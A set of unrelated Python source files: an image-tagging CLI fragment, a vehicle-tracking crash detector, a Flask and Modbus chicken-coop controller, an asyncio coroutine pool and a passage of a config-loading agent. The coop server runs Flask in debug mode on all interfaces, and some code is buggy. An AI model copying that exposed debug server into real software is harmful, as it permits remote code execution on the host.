else:
client.tag_post(m, full, weak)
parser = ArgumentParser(prog=arg0)
parser.add_argument('-v', '--verbose', action="store_true")
parser.add_argument('-q', '--quiet', action="store_true")
parser.add_argument('-f', '--regenerate-thumbnail', action="store_true")
parser.add_argument('-n', '--no-tagging', action="store_true", help='prints what would have been tagged')
parser.add_argument('-g', '--tags-from-fn', action="store_true", help='generate tags from filename (all words except last)')
parser.add_argument('-d', '--dummy', action="store_true", help='only print what would be done')
parser.add_argument('-t', '--thumb-src', help='post or file to generate thumb from')
parser.add_argument('-T', '--type', help='override file type detection')
parser.add_argument('-z', '--timezone', help='timezone to assume EXIF dates are in (+-HHMM format)')
parser.add_argument('-o', '--override-tags', action="store_true", help='override existing tag values (from exif, TAGS (and filename))')
parser.add_argument('filename', nargs='+')
args = parser.parse_args(argv)
if args.thumb_src:
args.regenerate_thumbnail = True
client = Client()
lock = Lock()
if args.thumb_src:
if len(args.filename) > 1:
print("Only add one post with -t")
exit(1)
if not exists(args.thumb_src):
m = client.postspec2md5(args.thumb_src)
args.thumb_src = client.image_path(m)
if not exists(args.thumb_src):
print("Thumb source not found")
exit(1)
client.begin_transaction()
q = Queue()
bad_q = Queue()
warn_q = Queue()
for td in args.filename:
q.put(td)
in_progress = Manager().dict() # no set available
def worker():
while True:
try:
i = q.get(False)
except Empty:
break
try:
if isinstance(i, tuple):
i, m = i
else:
if args.verbose:
print(i)
data = open(i, "rb").read()
m = md5(data).hexdigest()
with lock:
if m in in_progress:
# try again later, keep the md5
# (don't just skip it, because tags may be different)
q.put((i, m))
continue
in_progress[m] = True
try:
add_image(i, m, data, warn_q)
finally:
with lock:
del in_progress[m]
except Exception:
print_exc()
bad_q.put(i)
# I would have used Pool, but it's completely broken if you ^C
ps = [Process(target=worker) for _ in range(min(cpu_count(), len(args.filename)))]
for p in ps:
p.daemon = True
p.start()
for p in ps:
p.join()
client.end_transaction()
def print_q(q, msg):
if not q.empty():
print()
print(msg)
while True:
try:
print("\t%s" % (q.get(False),))
except Empty:
break
print_q(warn_q, "Files with warnings:")
print_q(bad_q, "Failed files:")
|
Debug.py
|
from time import time
import cv2
import numpy as np
from Mosse_Tracker.TrackerManager import Tracker, TrackerType
from PIL import Image
#from Car_Detection_TF.yolo import YOLO
#from Car_Detection.detect import Yolo_image
from Mosse_Tracker.utils import draw_str
from boxes.yoloFiles import loadFile
pi=22/7
# clf = pickle.load(open('VIF/model-svm1.sav', 'rb'))
total_frames = []
counter_sub_video = 1
data = []
from VIF.vif import VIF
vif = VIF()
tracker_type = TrackerType.MOSSE
def predict(frames_RGB,trackers):
gray_frames = []
for frame in frames_RGB:
gray_frames.append(cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY))
no_crash = 0
crash = 0
for tracker in trackers:
tracker_frames,width,height,xmin,xmax,ymin,ymax = tracker.getFramesOfTracking(gray_frames)
if tracker_frames == None:
continue
# if xmax - xmin < 100:
# continue
#
# print("ymax"+str(ymax - ymin))
#
# print("xmax"+str(xmax - xmin))
#
# print("ymax/x"+str((ymax- ymin) / (xmax - xmin)))
if xmax - xmin < 50: #50
continue
if ymax - ymin <= 28: #35
continue
if (ymax- ymin) / (xmax - xmin) <0.35: #0.35
continue
feature_vec = vif.process(tracker_frames)
result = vif.clf.predict(feature_vec.reshape(1, 304))
if result[0] == 0.0:
no_crash += 1
else:
crash += 1
# trackers[0].saveTracking(frames_RGB)
# trackers[1].saveTracking(frames_RGB)
tracker.saveTracking(frames_RGB)
# print(crash, no_crash)
def checkDistance(frames,tracker_A,tracker_B,frame_no):
if not tracker_A.isAboveSpeedLimit(frame_no-10,frame_no) and not tracker_B.isAboveSpeedLimit(frame_no-10,frame_no) :
return False
xa, ya = tracker_A.estimationFutureCenter[frame_no]
xb, yb = tracker_B.estimationFutureCenter[frame_no]
r = pow(pow(xa - xb, 2) + pow(ya - yb, 2), 0.5)
tracker_A_area = 0.5 * tracker_A.width * tracker_A.height
tracler_B_area = 0.5 * tracker_B.width * tracker_B.height
# iou = intersectionOverUnion(tracker_A.tracker.getCutFramePosition((xa,ya)),tracker_B.tracker.getCutFramePosition((xb,yb)))
# iou2 = intersectionOverUnion(tracker_B.tracker.getCutFramePosition((xa, ya)),
# tracker_A.tracker.getCutFramePosition(tracker_A.tracker.center))
if tracker_type == TrackerType.MOSSE:
xa_actual,ya_actual = tracker_A.tracker.centers[frame_no]
xb_actual,yb_actual = tracker_B.tracker.centers[frame_no]
else:
xa_actual,ya_actual = tracker_A.get_position(tracker_A.history[frame_no])
xb_actual,yb_actual = tracker_B.get_position(tracker_B.history[frame_no])
difference_trackerA_actual_to_estimate = pow(pow(xa_actual - xa, 2) + pow(ya_actual - ya, 2), 0.5)
difference_trackerB_actual_to_estimate = pow(pow(xb_actual - xb, 2) + pow(yb_actual - yb, 2), 0.5)
max_difference = max(difference_trackerA_actual_to_estimate,difference_trackerB_actual_to_estimate)
# print(r,difference_trackerA_actual_to_estimate,difference_trackerB_actual_to_estimate,max_difference/r)
if r == 0:
return True
if r < 40 and max_difference/r > 0.5:
# print(r,difference_trackerA_actual_to_estimate,difference_trackerB_actual_to_estimate,max_difference/r)
return True
return False
def process(trackers,frames):
# predict(frames, trackers)
new_trackers = trackers
# for tracker in trackers:
# if tracker.isAboveSpeedLimit():
# new_trackers.append(tracker)
for i in range(len(new_trackers)):
for j in range(i+1,len(trackers)):
if i == j:
continue
tracker_A = trackers[i]
tracker_B = trackers[j]
if checkDistance(frames,tracker_A,tracker_B,16) or checkDistance(frames,tracker_A,tracker_B,19) or checkDistance(frames,tracker_A,tracker_B,22) or checkDistance(frames,tracker_A,tracker_B,25) or checkDistance(frames,tracker_A,tracker_B,28):
# tracker_A.saveTracking(frames)
# print("Maybe an accident has occured!")
predict(frames, [tracker_B,tracker_A])
class MainFlow:
def __init__(self, yolo, fromFile=True, select=False):
self.yolo = yolo
self.frameCount = 0
self.readFile = fromFile
# if select == False then use TF else use PYTORCH
self.selectYOLO = select
self.trackerId = 0
def run(self, path):
global total_frames
last_30_frames = []
last_delayed_30_frames = []
fileBoxes = []
new_frame = None
if self.readFile:
fileBoxes = loadFile(path)
# model = ''
# if self.selectYOLO:
# model = Darknet("Car_Detection/config/yolov3.cfg", CUDA=False)
# model.load_weight("Car_Detection/config/yolov3.weights")
cap = cv2.VideoCapture(path)
#frame_width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
#frame_height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
frame_width = 480
frame_height = 360
trackers = []
delayed_trackers = []
# run yolo every fps frames
fps = 30
hfps = 15
no_of_frames = 0
paused = False
cum_time = 0
while True:
if not paused:
t = time()
# read new frame
ret, frame = cap.read()
# if ret and no_of_frames <120:
# no_of_frames+=1
# continue
if ret:
dim = (480, 360)
frame = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA)
#frame = cv2.GaussianBlur(frame, (-1, -1), 1.0) # 2.0
new_frame = frame.copy()
total_frames.append(new_frame)
# failed to get new frame
else:
break
# run ViF
if self.frameCount > 0 and (self.frameCount % fps == 0 or self.frameCount == fps - 1):
#print("FRAME " + str(self.frameCount) + " VIF")
#thread = Thread(target=predict(last_30_frames,trackers))
#thread.start()
#print("error")
#vif(trackers, frame_width, frame_height, frame)
t = time()
# thread = Thread(target=process(trackers,last_30_frames))
# thread.start()
process(trackers,last_30_frames)
print(time() - t)
if self.frameCount > 16 and self.frameCount % hfps == 0 and self.frameCount % fps != 0:
# print("FRAME " + str(self.frameCount) + " VIF")
# thread = Thread(target=predict(last_30_frames,trackers))
# thread.start()
# print("error")
# vif(trackers, frame_width, frame_height, frame)
t = time()
# thread = Thread(target=process(delayed_trackers, last_delayed_30_frames))
# thread.start()
#
process(delayed_trackers, last_delayed_30_frames)
print(time() - t)
if self.frameCount > 0 and self.frameCount % hfps == 0 and self.frameCount % fps != 0:
# print("YOLO CALLED in frame no. " + str(self.frameCount))
# clear earlier trackers
delayed_trackers = []
bboxes = []
last_delayed_30_frames = []
img = Image.fromarray(frame)
# detect vehicles
if self.readFile:
# From files
bboxes = fileBoxes[self.frameCount]
elif not self.selectYOLO:
# Khaled
img, bboxes = self.yolo.detect_image(img)
else:
# Roba
bboxes = Yolo_image(np.float32(img), model)
for i, bbox in enumerate(bboxes):
label = bbox[0]
# accuracy = bbox[5]
xmin = int(bbox[1])
xmax = int(bbox[2])
ymin = int(bbox[3])
ymax = int(bbox[4])
# can limit this part to cars and trucks only later
# cv2.rectangle(frame, (xmin, ymin), (xmax, ymax), (0, 0, 255))
frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
self.trackerId += 1
# no need for frame_width and frame_height
if xmax < frame_width and ymax < frame_height:
tr = Tracker(frame_gray, (xmin, ymin, xmax, ymax), frame_width, frame_height,
self.trackerId,tracker_type)
delayed_trackers.append(tr)
elif xmax < frame_width and ymax >= frame_height:
tr = Tracker(frame_gray, (xmin, ymin, xmax, frame_height - 1), frame_width, frame_height,
self.trackerId,tracker_type)
delayed_trackers.append(tr)
elif xmax >= frame_width and ymax < frame_height:
tr = Tracker(frame_gray, (xmin, ymin, frame_width - 1, ymax), frame_width, frame_height,
self.trackerId,tracker_type)
delayed_trackers.append(tr)
else:
tr = Tracker(frame_gray, (xmin, ymin, frame_width - 1, frame_height - 1), frame_width,
frame_height, self.trackerId,tracker_type)
delayed_trackers.append(tr)
else:
#print("updating trackers, frame no. " + str(self.frameCount) + "...")
frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
#print(len(trackers))
# updating trackers
for i, tracker in enumerate(delayed_trackers):
left, top, right, bottom = tracker.update(frame_gray)
# radian = tracker.getCarAngle() * (pi / 180)
# radian = 0
#
# #left = left * math.cos(radian) - top * math.sin(radian)
# #right = right * math.cos(radian) - bottom * math.sin(radian)
# #top = left * math.sin(radian) + top * math.cos(radian)
# #bottom = right * math.sin(radian) + bottom * math.cos(radian)
#
left_future, top_future, right_future, bottom_future = tracker.futureFramePosition()
#
# if left > 0 and top > 0 and right < frame_width and bottom < frame_height:
# if tracker.isAboveSpeedLimit():
# cv2.rectangle(frame, (int(left), int(top)),(int(right), int(bottom)), (0, 0, 255)) #B G R
# else:
# cv2.rectangle(frame, (int(left), int(top)),(int(right), int(bottom)), (255, 0, 0))
#
#
#
#
# #draw_str(frame, (left, bottom + 64), 'Max Speed: %.2f' % tracker.getMaxSpeed())
# #draw_str(frame, (left, bottom + 16), 'Avg Speed: %.2f' % tracker.getAvgSpeed())
# #draw_str(frame, (left, bottom + 96), 'Cur Speed: %.2f' % tracker.getCurrentSpeed())
# #draw_str(frame, (left, bottom + 112), 'Area Size: %.2f' % tracker.getCarSizeCoefficient())
# #draw_str(frame, (left, bottom + 32), 'Moving Angle: %.2f' % tracker.getCarAngle())
#
# if left_future > 0 and top_future > 0 and right_future < frame_width and bottom_future < frame_height:
# cv2.rectangle(frame, (int(left_future), int(top_future)), (int(right_future), int(bottom_future)), (0, 255, 0))
# Call YOLO
if self.frameCount % fps == 0 or self.frameCount == 0:
#print("YOLO CALLED in frame no. " + str(self.frameCount))
# clear earlier trackers
trackers = []
bboxes = []
last_30_frames = []
img = Image.fromarray(frame)
# detect vehicles
if self.readFile:
# From files
bboxes = fileBoxes[self.frameCount]
elif not self.selectYOLO:
# Khaled
img, bboxes = self.yolo.detect_image(img)
else:
# Roba
bboxes = Yolo_image(np.float32(img), model)
for i, bbox in enumerate(bboxes):
label = bbox[0]
# accuracy = bbox[5]
xmin = int(bbox[1])
xmax = int(bbox[2])
ymin = int(bbox[3])
ymax = int(bbox[4])
# can limit this part to cars and trucks only later
# cv2.rectangle(frame, (xmin, ymin), (xmax, ymax), (0, 0, 255))
frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
self.trackerId +=1
# no need for frame_width and frame_height
if xmax < frame_width and ymax < frame_height:
tr = Tracker(frame_gray, (xmin, ymin, xmax, ymax), frame_width, frame_height,self.trackerId,tracker_type)
trackers.append(tr)
elif xmax < frame_width and ymax >= frame_height:
tr = Tracker(frame_gray, (xmin, ymin, xmax, frame_height - 1), frame_width, frame_height,self.trackerId,tracker_type)
trackers.append(tr)
elif xmax >= frame_width and ymax < frame_height:
tr = Tracker(frame_gray, (xmin, ymin, frame_width - 1, ymax), frame_width, frame_height,self.trackerId,tracker_type)
trackers.append(tr)
else:
tr = Tracker(frame_gray, (xmin, ymin, frame_width - 1, frame_height - 1), frame_width, frame_height,self.trackerId,tracker_type)
trackers.append(tr)
else:
#print("updating trackers, frame no. " + str(self.frameCount) + "...")
frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
#print(len(trackers))
# updating trackers
for i, tracker in enumerate(trackers):
left, top, right, bottom = tracker.update(frame_gray)
radian = tracker.getCarAngle() * (pi / 180)
radian = 0
#left = left * math.cos(radian) - top * math.sin(radian)
#right = right * math.cos(radian) - bottom * math.sin(radian)
#top = left * math.sin(radian) + top * math.cos(radian)
#bottom = right * math.sin(radian) + bottom * math.cos(radian)
left_future, top_future, right_future, bottom_future = tracker.futureFramePosition()
if left > 0 and top > 0 and right < frame_width and bottom < frame_height:
if tracker.isAboveSpeedLimit():
cv2.rectangle(frame, (int(left), int(top)),(int(right), int(bottom)), (0, 0, 255)) #B G R
else:
cv2.rectangle(frame, (int(left), int(top)),(int(right), int(bottom)), (255, 0, 0))
#draw_str(frame, (left, bottom + 64), 'Max Speed: %.2f' % tracker.getMaxSpeed())
draw_str(frame, (left, bottom + 16), 'Avg Speed: %.2f' % tracker.getAvgSpeed())
#draw_str(frame, (left, bottom + 96), 'Cur Speed: %.2f' % tracker.getCurrentSpeed())
#draw_str(frame, (left, bottom + 112), 'Area Size: %.2f' % tracker.getCarSizeCoefficient())
#draw_str(frame, (left, bottom + 32), 'Moving Angle: %.2f' % tracker.getCarAngle())
if left_future > 0 and top_future > 0 and right_future < frame_width and bottom_future < frame_height:
cv2.rectangle(frame, (int(left_future), int(top_future)), (int(right_future), int(bottom_future)), (0, 255, 0))
# sleep(0.02)
#cv2.namedWindow("result", cv2.WINDOW_NORMAL)
cum_time += time() - t
cv2.imshow("result", frame)
last_30_frames.append(new_frame)
last_delayed_30_frames.append(new_frame)
if self.frameCount %fps == 0:
print(self.frameCount/cum_time)
# increment number of frames
self.frameCount += 1
ch = cv2.waitKey(10)
if ch == ord(' '):
paused = not paused
print(self.trackerId)
if __name__ == '__main__':
# m = MainFlow(None, select=False)
# m.run('videos/1500.mp4')
m = MainFlow(None, select=False)
# m.run('videos/1508.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1516.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1521.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1528.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1529.mp4')
# m = MainFlow(None, select=False)
m.run('videos/1533.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1534.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/Easy.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1559.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1563.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1566.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1537.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1506.mp4')
# m = MainFlow(None, select=False) #but have issue in the yolo file
# m.run('videos/1513.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1518.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1528.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1543.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1503.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1517.mp4')
#
m = MainFlow(None, select=False)
# m.run('videos/1601.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1561.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1562.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1564.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/1565.mp4')
# m = MainFlow(None, select=False)
# m.run('videos/normal1.mp4')
# for i in range(1543,1545):
# print("F")
# m = MainFlow(None, select=False)
# m.run('videos/'+str(i)+'.mp4')
|
chickencoop.py
|
#To use this program run the following from admin command prompt:
#pip install flask pymodbus
#
from flask import Flask, render_template, request
import os.path
import requests
import random
import pickle
import atexit
from threading import Thread, Lock, Event
import time
import datetime
from pymodbus.client.sync import ModbusSerialClient as ModbusClient
from pymodbus.exceptions import ModbusIOException
import logging
ioStatus = {'tempC':0.0,
'heaterPctCmd':0,
'heaterPctOut':0,
'lightPctCmd':0,
'lightPctOut':0,
'doorCmd':0,
'doorStatus':0}
ioStatusLock = Lock()
stopNow = Event()
#Set up logging
logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.INFO)
#Set up Modbus client to talk to Arduino. Be sure to use port by ID so we always
#get the right one (it can switch from /dev/ttyUSB0 to /dev/ttyUSB1 without warning)
client = ModbusClient(method='rtu',
port='/dev/serial/by-id/usb-FTDI_FT232R_USB_UART_AH05HBFT-if00-port0',
timeout=1,
baudrate=57600,
stopbits = 1,
bytesize = 8,
parity = 'N')
clientLock = Lock()
client.connect()
weather = None
#Set up web server
app = Flask(__name__)
def backgroundLoop():
log.info("Background loop started.")
while not stopNow.wait(1):
doModbus()
def weatherLoop():
global weather
log.info("Weather thread started")
weather = getWeather()
while not stopNow.wait(600):
weather = getWeather()
def doorCommand(number):
pass
def doorStatus():
return 0
#def isItSunrise():
#global sunriseTime
#sunriseTime = datetime.datetime.strptime(getSunrise(), '%H:%M %p').time()
def saveSettings():
pickle.dump( settings, open( "save.p", "wb" ) )
def loadSettings():
if os.path.isfile("save.p"):
log.info("loading settings from save.p")
return pickle.load( open( "save.p", "rb" ) )
else:
log.info("loading default settings")
return {
'WOEID' : "2396147"
}
# Lookup WOEID via http://weather.yahoo.com.
settings = loadSettings()
atexit.register(saveSettings)
def getWeather():
baseurl = "https://query.yahooapis.com/v1/public/yql?q="
yql_query = "select astronomy, item.condition from weather.forecast where woeid=" + settings['WOEID']
yql_url = baseurl + yql_query + "&format=json"
r = requests.get(yql_url)
if r.status_code != 200:
#There was a problem
return None
#
return r.json()['query']['results']['channel']
def getOutsideCondition():
return weather['item']['condition']['text']
def getInternalTemperature():
with ioStatusLock:
#We're thread protected in here
t = ioStatus['tempC']
return t
def getExternalTemperature():
return int(weather['item']['condition']['temp'])
def getSunrise():
return weather['astronomy']['sunrise']
def getSunset():
return weather['astronomy']['sunset']
#Modbus memory map for communication with slave
#0 TEMPC10, //0-600C * 10 = degrees C x 10
#1 HEATER_PCT_CMD, //0-100%
#2 HEATER_PCT_OUT, //0-100%
#3 LIGHT_PCT_CMD, //0-100%
#4 LIGHT_PCT_OUT, //0-100%
#5 DOOR_CMD,
#6 DOOR_STATUS,
#7 TOTAL_ERRORS,
def doModbus():
try:
#Read 8 holding registers from address 0
with clientLock:
#We're thread protected in here
rr = client.read_holding_registers(0, 8, unit=1)
#Make sure the read was successful
assert(rr.function_code < 0x80)
with ioStatusLock:
#We're thread protected in here
#Copy the read values
ioStatus['tempC'] = rr.registers[0]/10.0
ioStatus['heaterPctOut'] = rr.registers[2]
ioStatus['lightPctOut'] = rr.registers[4]
ioStatus['doorStatus'] = rr.registers[6]
ioStatus['totalErrors'] = rr.registers[7]
except Exception as e:
log.exception(e)
#Sets ioStatus key/value pair and writes to specified Modbus register
def writeRegister(key, value, addr):
try:
with ioStatusLock:
#We're thread protected in here
ioStatus[key] = value
#Write the register
with clientLock:
#We're thread protected in here
rq = client.write_register(addr,value,unit=1)
assert(rq.function_code < 0x80)
except Exception as e:
log.exception(e)
def setHeaterPct(value):
writeRegister('heaterPctCmd',value,1)
def setLightPct(value):
writeRegister('lightPctCmd',value,3)
def setDoor(value):
writeRegister('doorCmd',value,5)
@app.route("/", methods=['GET', 'POST'])
def hello():
with ioStatusLock:
templateData = {
'outsidecondition' : getOutsideCondition(),
'internaltemperature': "{}".format(ioStatus['tempC']),
'externaltemperature' : "{}".format(getExternalTemperature()),
'sunrise': getSunrise(),
'sunset': getSunset(),
'doorStatus': ioStatus['doorStatus'],
'heaterPctOut': ioStatus['heaterPctOut'],
'lightPctOut': ioStatus['lightPctOut'],
'title' : 'The Cutting Coop'
}
#Check button presses
for s in request.values:
app.logger.info(s)
if 'doorOpen' in request.values:
app.logger.info("Button clicked: Open door")
setDoor(1)
elif 'doorClose' in request.values:
app.logger.info("Button clicked: Close door")
setDoor(2)
return render_template('main.html', **templateData)
if __name__ == "__main__":
t = Thread(target=backgroundLoop)
w = Thread(target=weatherLoop)
w.start()
t.start()
app.run(host='0.0.0.0', port=8080, debug=True, use_reloader=False)
#All done
stopNow.set()
t.join()
w.join()
|
asyncPool.py
|
"""
asyncio 实现的协程池 asyncio为python原生支持
调用时需要引入
import asyncio
还有另外一个版本的实现 asyncPoolGevent 为 Gevent实现协程
"""
# -*- coding:utf-8 -*-
import asyncio
import queue
from concurrent.futures import ThreadPoolExecutor
class 协程池(object):
"""
1. 支持动态添加任务
2. 支持停止事件循环
3. 支持最大协程数:maxsize
4. 支持进度条
5. 实时获取剩余协程数
6. 支持阻塞协程,需要线程进行支持,注意设置线程池:pool_maxsize
"""
def __init__(self, 协程数量=1, 线程池数量=None, loop=None):
"""
初始化
:param loop: 事件循环对象
:param maxsize: 默认为1
:param pool_maxsize: 默认为系统内核数
"""
# 在jupyter需要这个,不然asyncio运行出错
# import nest_asyncio
# nest_asyncio.apply()
# 任务计数器
self._task, self._task_done_count, self._task_progress_list = self.task_create()
# 协程池
self._loop, self._loop_thread, self._thread_pool = self.start_loop(
loop,
pool_maxsize=线程池数量)
# 限制并发量为500
self.semaphore = asyncio.Semaphore(协程数量, loop=self._loop)
@staticmethod
def task_create():
"""
创建任务对象
:param
:return:
"""
# 队列,先进先出,根据队列是否为空判断,退出协程
# self.task_done_count: 任务完成后的计数器
# 任务组,用来阻塞任务用的
task = queue.Queue()
# 任务完成后的计数器
task_done_count = queue.Queue()
# 任务进度值存储
# 确保任务值是唯一的
task_progress_list = []
return task, task_done_count, task_progress_list
def task_add(self, item=1):
"""
添加任务
:param item:
:return:
"""
self._task.put(item)
def task_done(self, fn):
"""
任务完成
回调函数
已完成任务计数
:param fn:
:return:
"""
if fn:
pass
self._task.get()
self._task.task_done()
# 已完成任务计数
self._task_done_count.put(1)
def task_progress(self, total):
"""
任务进度条
适用于已知任务总数的情况
:param total: 任务总数
:return:
"""
# 任务完成计数
# 需要剔除任务停止的任务数
count = self._task_done_count.qsize() - 1
if count < 0:
count = 0
item = int(count / total * 100)
if count == total:
# 任务完成
self._task_progress_list.append(100)
elif item not in self._task_progress_list:
# 过程值
self._task_progress_list.append(item)
else:
pass
self._task_progress_list = list(set(self._task_progress_list))
self._task_progress_list.sort()
return self._task_progress_list[-1]
def get_task(self):
"""
获取事件循环任务列表
:return:
"""
task_list = asyncio.Task.all_tasks(loop=self._loop)
# task_list = asyncio.all_tasks(loop=self._loop)
return task_list
def 等待(self):
"""
任务阻塞
等待所有任务执行完毕
:return:
"""
self._task.join()
# self._thread_pool.shutdown()
@property
def running(self):
"""
获取剩余协程数
:return:
"""
# 剩余任务数
# 需要剔除任务停止的任务数
count = self._task.qsize() - 1
if count < 0:
count = 0
return count
@staticmethod
def _start_thread_loop(loop):
"""
运行事件循环
:param loop: loop以参数的形式传递进来运行
:return:
"""
# 将当前上下文的事件循环设置为循环。
asyncio.set_event_loop(loop)
# 开始事件循环
loop.run_forever()
async def _stop_thread_loop(self, loop_time=1):
"""
停止协程
关闭线程
:return:
"""
while True:
if self._task.empty():
# 停止协程
self._loop.stop()
break
await asyncio.sleep(loop_time)
def start_loop(self, loop, pool_maxsize=None):
"""
运行事件循环
开启新线程
:param loop: 协程
:param pool_maxsize: 线程池大小,默认为系统内核数
:return:
"""
# 获取一个事件循环
if not loop:
loop = asyncio.new_event_loop()
# 线程池
thread_pool = ThreadPoolExecutor(pool_maxsize)
# 设置线程池
loop.set_default_executor(thread_pool)
# from threading import Thread
# thread_pool = Thread(target=self._start_thread_loop, args=(loop,))
# 设置守护进程
# thread_pool.setDaemon(True)
# 运行线程,同时协程事件循环也会运行
# thread_pool.start()
# 启动子线程
# 协程开始启动
thread_pool.submit(self._start_thread_loop, loop)
return loop, thread_pool, thread_pool
def stop_loop(self, loop_time=1):
"""
队列为空,则关闭线程
:param loop_time:
:return:
"""
# 关闭线程任务
asyncio.run_coroutine_threadsafe(self._stop_thread_loop(loop_time), self._loop)
# 取消单个任务
# task.cancel()
def _close(self):
"""
关闭事件循环,不然会重启
会导致错误
# RuntimeError: Cannot close a running event loop
:return:
"""
self._loop.close()
def 释放线程(self, loop_time=1):
"""
释放线程
:param loop_time:
:return:
"""
self.stop_loop(loop_time)
async def async_semaphore_func(self, func):
"""
信号代理
:param func:
:return:
"""
async with self.semaphore:
return await func
async def async_thread_pool_func(self, block_func, *args, thread_pool=True):
"""
信号代理
线程池代理
loop: asyncio.AbstractEventLoop
:param block_func: 阻塞任务
:param args: 参数
:param thread_pool: 是否使用自定义线程池
:return:
"""
async with self.semaphore:
if not thread_pool:
# 默认线程池
return await self._loop.run_in_executor(None, block_func, *args)
# 使用自定义线程池
future = await self._loop.run_in_executor(self._thread_pool, block_func, *args)
# gather = await asyncio.gather(future) # 阻塞
# gather = await asyncio.wait(future) # 阻塞
return future
def _submit(self, func, callback=None):
"""
非阻塞模式
提交任务到事件循环
:param func: 异步函数对象
:param callback: 回调函数
:return:
"""
self.task_add()
# 将协程注册一个到运行在线程中的循环,thread_loop 会获得一个环任务
# 注意:run_coroutine_threadsafe 这个方法只能用在运行在线程中的循环事件使用
# future = asyncio.run_coroutine_threadsafe(func, self.loop)
future = asyncio.run_coroutine_threadsafe(self.async_semaphore_func(func), self._loop)
# 添加回调函数,添加顺序调用
if callback:
future.add_done_callback(callback)
future.add_done_callback(self.task_done)
def 投递任务(self, func, *args, 回调函数=None):
"""
非阻塞模式
提交任务到事件循环
:param func: 异步函数对象
:param args: 参数
:param callback: 回调函数
:return:
"""
self.task_add()
# 将协程注册一个到运行在线程中的循环,thread_loop 会获得一个环任务
# 注意:run_coroutine_threadsafe 这个方法只能用在运行在线程中的循环事件使用
# future = asyncio.run_coroutine_threadsafe(func, self.loop)
future = asyncio.run_coroutine_threadsafe(self.async_semaphore_func(func(*args)), self._loop)
# 添加回调函数,添加顺序调用
if 回调函数:
future.add_done_callback(回调函数)
future.add_done_callback(self.task_done)
def 投递任务2(self, func, *args, 回调函数=None):
"""
阻塞模式
提交任务到事件循环
:param func: 异步函数对象
:param args: 入参
:param callback: 回调函数
:return:
"""
self.task_add()
# 将协程注册一个到运行在线程中的循环,thread_loop 会获得一个环任务
# 注意:run_coroutine_threadsafe 这个方法只能用在运行在线程中的循环事件使用
# future = self._loop.run_in_executor(None, func)
# future = asyncio.ensure_future(self._loop.run_in_executor(None, func)) # 非阻塞
future = asyncio.run_coroutine_threadsafe(
self.async_thread_pool_func(func, *args),
self._loop)
# 添加回调函数,添加顺序调用
if 回调函数:
future.add_done_callback(回调函数)
future.add_done_callback(self.task_done)
|
run.py
|
"""Run a simulation from an existing WMT configuration."""
from __future__ import print_function
import os
import argparse
from ..slave import Slave
from ..env import WmtEnvironment
from cmt.component.model import Model
def run(path):
os.chdir(path)
import yaml
with open('model.yaml', 'r') as opened:
model = yaml.load(opened.read())
status_file = os.path.abspath(os.path.join(
model['driver'], '_time.txt'))
#status = TaskStatus(self.id, self.server, status_file)
#timer = threading.Thread(target=status)
#timer.start()
with open('components.yaml', 'r') as opened:
model = Model.load(opened.read())
#report('running', 'running model')
#model.go(file='model.yaml')
#report('running', 'finished')
def main():
import argparse
import traceback
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('path', help='Path to simulation directory')
parser.add_argument('--config', default=None,
help='WMT site configuration file')
parser.add_argument('--show-env', action='store_true',
help='print execution environment and exit')
parser.add_argument('--verbose', action='store_true',
help='Be verbose')
args = parser.parse_args()
env = WmtEnvironment.from_config(args.config)
if args.show_env:
print(str(env))
return
run(args.path)
|
app.py
|
# -*- coding: utf-8 -*-
from flask import Flask, jsonify, request
from configparser import ConfigParser
from warnings import filterwarnings
from urllib.request import urlopen
from threading import Thread
from logging import handlers
import logging
import pymysql
import pexpect
import json
from bin.server_obj import Server
from bin.errorlog_obj import ErrorLog
import bin.db_management as db_management
# convert human sizes to bytes
def convert_bytes(byts):
try:
if byts.endswith('kb'):
return byts[0:-2] * 1024
elif byts.endswith('mb'):
return byts[0:-2] * 1024 * 1024
elif byts.endswith('gb'):
return byts[0:-2] * 1024 * 1024 * 1024
else:
raise IOError('Invalid input. Correct format: #kb/#mb/#gb like 10gb or 5mb')
except ValueError:
raise IOError('Invalid input. Correct format: #kb/#mb/#gb like 10gb or 5mb')
# load config file
config = ConfigParser()
config.read('config.ini')
err_type = ''
log_file = ''
log_size_limit = ''
log_file_number_limit = 0
db_host = ''
db_port = 0
db_user = ''
db_pass = ''
db_name = ''
db_prefix = ''
interval_time = 0
flsk_host = ''
flsk_port = 0
try:
# log values
err_type = 'Log > Name'
log_file = config.get('Log', 'Name', fallback='agent.log')
err_type = 'Log > Size_limit'
log_size_limit = config.get('Log', 'Size_limit', fallback='5mb')
log_size_limit = convert_bytes(log_size_limit)
err_type = 'Log > File_Limit'
log_file_number_limit = config.getint('Log', 'File_Limit', fallback=10)
# database values
err_type = 'Storage > Host'
db_host = config.get('Storage', 'Host', fallback='localhost')
err_type = 'Storage > Port'
db_port = config.getint('Storage', 'Port', fallback=3306)
err_type = 'Storage > User'
db_user = config.get('Storage', 'User', fallback='root')
err_type = 'Storage > Password'
